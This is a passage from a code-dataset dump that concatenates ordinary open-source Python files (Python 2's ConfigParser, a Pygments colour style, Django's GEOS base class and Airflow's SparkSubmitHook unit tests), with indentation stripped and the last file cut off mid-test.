data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 0]
for item in data:
heappush(heap, item)
sort = []
while heap:
sort.append(heappop(heap))
print(sort)
import doctest
doctest.testmod()
| gpl-3.0 |
wang1352083/pythontool | python-2.7.12-lib/ConfigParser.py | 186 | 27746 | """Configuration file parser.
A setup file consists of sections, lead by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, options)
like get(), but convert value to an integer
getfloat(section, options)
like get(), but convert value to a float
getboolean(section, options)
like get(), but convert value to a boolean (currently case
insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
try:
from collections import OrderedDict as _default_dict
except ImportError:
# fallback for setup.py which hasn't yet built _collections
_default_dict = dict
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation in
BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation in
BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6. To prevent
# DeprecationWarning from popping up over this pre-existing attribute, use
# a new property that takes lookup precedence.
message = property(_get_message, _set_message)
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
self.args = (section, )
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
self.args = (section, )
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
self.args = (option, section)
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
self.args = (option, section, msg)
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
self.args = (option, section, rawval, reference)
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
self.args = (option, section, rawval)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
self.args = (filename, )
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
self.args = (filename, lineno, line)
class RawConfigParser:
def __init__(self, defaults=None, dict_type=_default_dict,
allow_no_value=False):
self._dict = dict_type
self._sections = self._dict()
self._defaults = self._dict()
if allow_no_value:
self._optcre = self.OPTCRE_NV
else:
self._optcre = self.OPTCRE
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
already exists. Raise ValueError if name is DEFAULT or any of it's
case-insensitive variants.
"""
if section.lower() == "default":
raise ValueError, 'Invalid section name: %s' % section
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = self._dict()
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = self._dict()
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value=None):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key == "__name__":
continue
if (value is not None) or (self._optcre == self.OPTCRE):
key = " = ".join((key, str(value).replace('\n', '\n\t')))
fp.write("%s\n" % (key))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
OPTCRE_NV = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?:' # any number of space/tab,
r'(?P<vi>[:=])\s*' # optionally followed by
# separator (either : or
# =), followed by any #
# space/tab
r'(?P<value>.*))?$' # everything up to eol
)
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
The sections in setup file contains a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname].append(value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict()
cursect['__name__'] = sectname
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self._optcre.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
optname = self.optionxform(optname.rstrip())
# This check is fine because the OPTCRE cannot
# match if it would set optval to None
if optval is not None:
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
cursect[optname] = [optval]
else:
# valueless option handling
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
# join the multi-line values collected while reading
all_sections = [self._defaults]
all_sections.extend(self._sections.values())
for options in all_sections:
for name, val in options.items():
if isinstance(val, list):
options[name] = '\n'.join(val)
import UserDict as _UserDict
class _Chainmap(_UserDict.DictMixin):
"""Combine multiple mappings for successive lookups.
For example, to emulate Python's normal lookup sequence:
import __builtin__
pylookup = _Chainmap(locals(), globals(), vars(__builtin__))
"""
def __init__(self, *maps):
self._maps = maps
def __getitem__(self, key):
for mapping in self._maps:
try:
return mapping[key]
except KeyError:
pass
raise KeyError(key)
def keys(self):
result = []
seen = set()
for mapping in self._maps:
for key in mapping:
if key not in seen:
result.append(key)
seen.add(key)
return result
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
If `vars' is provided, it must be a dictionary. The option is looked up
in `vars' (if provided), `section', and in `defaults' in that order.
All % interpolations are expanded in the return values, unless the
optional argument `raw' is true. Values for interpolation keys are
looked up in the same manner as the option.
The section DEFAULT is special.
"""
sectiondict = {}
try:
sectiondict = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
vardict = {}
if vars:
for key, value in vars.items():
vardict[self.optionxform(key)] = value
d = _Chainmap(vardict, sectiondict, self._defaults)
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw or value is None:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if value and "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e.args[0])
else:
break
if value and "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_re = re.compile(r"%\(([^)]+)\)s")
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_re.match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value=None):
"""Set an option. Extend ConfigParser.set: check for string values."""
# The only legal non-string value if we allow valueless
# options is None, so we need to check if the value is a
# string if:
# - we do not allow valueless options, or
# - we allow valueless options but the value is not None
if self._optcre is self.OPTCRE or value:
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
if value is not None:
# check for bad percent signs:
# first, replace all "good" interpolations
tmp_value = value.replace('%%', '')
tmp_value = self._interpvar_re.sub('', tmp_value)
# then, check if there's a lone percent sign left
if '%' in tmp_value:
raise ValueError("invalid interpolation syntax in %r at "
"position %d" % (value, tmp_value.find('%')))
ConfigParser.set(self, section, option, value)
| mit |
timonwong/OmniMarkupPreviewer | OmniMarkupLib/Renderers/libs/pygments/styles/native.py | 135 | 1938 | # -*- coding: utf-8 -*-
"""
pygments.styles.native
~~~~~~~~~~~~~~~~~~~~~~
pygments version of my "native" vim theme.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
class NativeStyle(Style):
"""
Pygments version of the "native" vim theme.
"""
background_color = '#202020'
highlight_color = '#404040'
styles = {
Token: '#d0d0d0',
Whitespace: '#666666',
Comment: 'italic #999999',
Comment.Preproc: 'noitalic bold #cd2828',
Comment.Special: 'noitalic bold #e50808 bg:#520000',
Keyword: 'bold #6ab825',
Keyword.Pseudo: 'nobold',
Operator.Word: 'bold #6ab825',
String: '#ed9d13',
String.Other: '#ffa500',
Number: '#3677a9',
Name.Builtin: '#24909d',
Name.Variable: '#40ffff',
Name.Constant: '#40ffff',
Name.Class: 'underline #447fcf',
Name.Function: '#447fcf',
Name.Namespace: 'underline #447fcf',
Name.Exception: '#bbbbbb',
Name.Tag: 'bold #6ab825',
Name.Attribute: '#bbbbbb',
Name.Decorator: '#ffa500',
Generic.Heading: 'bold #ffffff',
Generic.Subheading: 'underline #ffffff',
Generic.Deleted: '#d22323',
Generic.Inserted: '#589819',
Generic.Error: '#d22323',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#aaaaaa',
Generic.Output: '#cccccc',
Generic.Traceback: '#d22323',
Error: 'bg:#e3d2d2 #a61717'
}
| mit |
samdowd/drumm-farm | drumm_env/lib/python2.7/site-packages/django/contrib/gis/geos/base.py | 437 | 1280 | from ctypes import c_void_p
from django.contrib.gis.geos.error import GEOSException
class GEOSBase(object):
"""
Base object for GEOS objects that has a pointer access property
that controls access to the underlying C pointer.
"""
# Initially the pointer is NULL.
_ptr = None
# Default allowed pointer type.
ptr_type = c_void_p
# Pointer access property.
def _get_ptr(self):
# Raise an exception if the pointer isn't valid don't
# want to be passing NULL pointers to routines --
# that's very bad.
if self._ptr:
return self._ptr
else:
raise GEOSException('NULL GEOS %s pointer encountered.' % self.__class__.__name__)
def _set_ptr(self, ptr):
# Only allow the pointer to be set with pointers of the
# compatible type or None (NULL).
if ptr is None or isinstance(ptr, self.ptr_type):
self._ptr = ptr
else:
raise TypeError('Incompatible pointer type')
# Property for controlling access to the GEOS object pointers. Using
# this raises an exception when the pointer is NULL, thus preventing
# the C library from attempting to access an invalid memory location.
ptr = property(_get_ptr, _set_ptr)
| mit |
nathanielvarona/airflow | tests/providers/apache/spark/hooks/test_spark_submit.py | 3 | 33603 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import os
import unittest
from unittest.mock import call, patch
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.providers.apache.spark.hooks.spark_submit import SparkSubmitHook
from airflow.utils import db
class TestSparkSubmitHook(unittest.TestCase):
_spark_job_file = 'test_application.py'
_config = {
'conf': {'parquet.compression': 'SNAPPY'},
'conn_id': 'default_spark',
'files': 'hive-site.xml',
'py_files': 'sample_library.py',
'archives': 'sample_archive.zip#SAMPLE',
'jars': 'parquet.jar',
'packages': 'com.databricks:spark-avro_2.11:3.2.0',
'exclude_packages': 'org.bad.dependency:1.0.0',
'repositories': 'http://myrepo.org',
'total_executor_cores': 4,
'executor_cores': 4,
'executor_memory': '22g',
'keytab': 'privileged_user.keytab',
'principal': 'user/spark@airflow.org',
'proxy_user': 'sample_user',
'name': 'spark-job',
'num_executors': 10,
'verbose': True,
'driver_memory': '3g',
'java_class': 'com.foo.bar.AppMain',
'application_args': [
'-f',
'foo',
'--bar',
'bar',
'--with-spaces',
'args should keep embedded spaces',
'baz',
],
}
@staticmethod
def cmd_args_to_dict(list_cmd):
return_dict = {}
for arg in list_cmd:
if arg.startswith("--"):
pos = list_cmd.index(arg)
return_dict[arg] = list_cmd[pos + 1]
return return_dict
def setUp(self):
db.merge_conn(
Connection(
conn_id='spark_yarn_cluster',
conn_type='spark',
host='yarn://yarn-master',
extra='{"queue": "root.etl", "deploy-mode": "cluster"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_k8s_cluster',
conn_type='spark',
host='k8s://https://k8s-master',
extra='{"spark-home": "/opt/spark", '
+ '"deploy-mode": "cluster", '
+ '"namespace": "mynamespace"}',
)
)
db.merge_conn(
Connection(conn_id='spark_default_mesos', conn_type='spark', host='mesos://host', port=5050)
)
db.merge_conn(
Connection(
conn_id='spark_home_set',
conn_type='spark',
host='yarn://yarn-master',
extra='{"spark-home": "/opt/myspark"}',
)
)
db.merge_conn(Connection(conn_id='spark_home_not_set', conn_type='spark', host='yarn://yarn-master'))
db.merge_conn(
Connection(
conn_id='spark_binary_set',
conn_type='spark',
host='yarn',
extra='{"spark-binary": "custom-spark-submit"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_binary_and_home_set',
conn_type='spark',
host='yarn',
extra='{"spark-home": "/path/to/spark_home", ' + '"spark-binary": "custom-spark-submit"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_standalone_cluster',
conn_type='spark',
host='spark://spark-standalone-master:6066',
extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "cluster"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_standalone_cluster_client_mode',
conn_type='spark',
host='spark://spark-standalone-master:6066',
extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "client"}',
)
)
def test_build_spark_submit_command(self):
# Given
hook = SparkSubmitHook(**self._config)
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_build_cmd = [
'spark-submit',
'--master',
'yarn',
'--conf',
'parquet.compression=SNAPPY',
'--files',
'hive-site.xml',
'--py-files',
'sample_library.py',
'--archives',
'sample_archive.zip#SAMPLE',
'--jars',
'parquet.jar',
'--packages',
'com.databricks:spark-avro_2.11:3.2.0',
'--exclude-packages',
'org.bad.dependency:1.0.0',
'--repositories',
'http://myrepo.org',
'--num-executors',
'10',
'--total-executor-cores',
'4',
'--executor-cores',
'4',
'--executor-memory',
'22g',
'--driver-memory',
'3g',
'--keytab',
'privileged_user.keytab',
'--principal',
'user/spark@airflow.org',
'--proxy-user',
'sample_user',
'--name',
'spark-job',
'--class',
'com.foo.bar.AppMain',
'--verbose',
'test_application.py',
'-f',
'foo',
'--bar',
'bar',
'--with-spaces',
'args should keep embedded spaces',
'baz',
]
assert expected_build_cmd == cmd
def test_build_track_driver_status_command(self):
# note this function is only relevant for spark setup matching below condition
# 'spark://' in self._connection['master'] and self._connection['deploy_mode'] == 'cluster'
# Given
hook_spark_standalone_cluster = SparkSubmitHook(conn_id='spark_standalone_cluster')
hook_spark_standalone_cluster._driver_id = 'driver-20171128111416-0001'
hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster')
hook_spark_yarn_cluster._driver_id = 'driver-20171128111417-0001'
# When
build_track_driver_status_spark_standalone_cluster = (
hook_spark_standalone_cluster._build_track_driver_status_command()
)
build_track_driver_status_spark_yarn_cluster = (
hook_spark_yarn_cluster._build_track_driver_status_command()
)
# Then
expected_spark_standalone_cluster = [
'/usr/bin/curl',
'--max-time',
'30',
'http://spark-standalone-master:6066/v1/submissions/status/driver-20171128111416-0001',
]
expected_spark_yarn_cluster = [
'spark-submit',
'--master',
'yarn://yarn-master',
'--status',
'driver-20171128111417-0001',
]
assert expected_spark_standalone_cluster == build_track_driver_status_spark_standalone_cluster
assert expected_spark_yarn_cluster == build_track_driver_status_spark_yarn_cluster
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_spark_process_runcmd(self, mock_popen):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.wait.return_value = 0
# When
hook = SparkSubmitHook(conn_id='')
hook.submit()
# Then
assert mock_popen.mock_calls[0] == call(
['spark-submit', '--master', 'yarn', '--name', 'default-name', ''],
stderr=-2,
stdout=-1,
universal_newlines=True,
bufsize=-1,
)
def test_resolve_should_track_driver_status(self):
# Given
hook_default = SparkSubmitHook(conn_id='')
hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster')
hook_spark_k8s_cluster = SparkSubmitHook(conn_id='spark_k8s_cluster')
hook_spark_default_mesos = SparkSubmitHook(conn_id='spark_default_mesos')
hook_spark_home_set = SparkSubmitHook(conn_id='spark_home_set')
hook_spark_home_not_set = SparkSubmitHook(conn_id='spark_home_not_set')
hook_spark_binary_set = SparkSubmitHook(conn_id='spark_binary_set')
hook_spark_binary_and_home_set = SparkSubmitHook(conn_id='spark_binary_and_home_set')
hook_spark_standalone_cluster = SparkSubmitHook(conn_id='spark_standalone_cluster')
# When
should_track_driver_status_default = hook_default._resolve_should_track_driver_status()
should_track_driver_status_spark_yarn_cluster = (
hook_spark_yarn_cluster._resolve_should_track_driver_status()
)
should_track_driver_status_spark_k8s_cluster = (
hook_spark_k8s_cluster._resolve_should_track_driver_status()
)
should_track_driver_status_spark_default_mesos = (
hook_spark_default_mesos._resolve_should_track_driver_status()
)
should_track_driver_status_spark_home_set = hook_spark_home_set._resolve_should_track_driver_status()
should_track_driver_status_spark_home_not_set = (
hook_spark_home_not_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_binary_set = (
hook_spark_binary_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_binary_and_home_set = (
hook_spark_binary_and_home_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_standalone_cluster = (
hook_spark_standalone_cluster._resolve_should_track_driver_status()
)
# Then
assert should_track_driver_status_default is False
assert should_track_driver_status_spark_yarn_cluster is False
assert should_track_driver_status_spark_k8s_cluster is False
assert should_track_driver_status_spark_default_mesos is False
assert should_track_driver_status_spark_home_set is False
assert should_track_driver_status_spark_home_not_set is False
assert should_track_driver_status_spark_binary_set is False
assert should_track_driver_status_spark_binary_and_home_set is False
assert should_track_driver_status_spark_standalone_cluster is True
def test_resolve_connection_yarn_default(self):
# Given
hook = SparkSubmitHook(conn_id='')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn"
def test_resolve_connection_yarn_default_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": "root.default",
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn"
assert dict_cmd["--queue"] == "root.default"
def test_resolve_connection_mesos_default_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default_mesos')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "mesos://host:5050",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "mesos://host:5050"
def test_resolve_connection_spark_yarn_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": "cluster",
"queue": "root.etl",
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn://yarn-master"
assert dict_cmd["--queue"] == "root.etl"
assert dict_cmd["--deploy-mode"] == "cluster"
def test_resolve_connection_spark_k8s_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"spark_home": "/opt/spark",
"queue": None,
"spark_binary": "spark-submit",
"master": "k8s://https://k8s-master",
"deploy_mode": "cluster",
"namespace": "mynamespace",
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "k8s://https://k8s-master"
assert dict_cmd["--deploy-mode"] == "cluster"
def test_resolve_connection_spark_k8s_cluster_ns_conf(self):
# Given we specify the config option directly
conf = {
'spark.kubernetes.namespace': 'airflow',
}
hook = SparkSubmitHook(conn_id='spark_k8s_cluster', conf=conf)
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"spark_home": "/opt/spark",
"queue": None,
"spark_binary": "spark-submit",
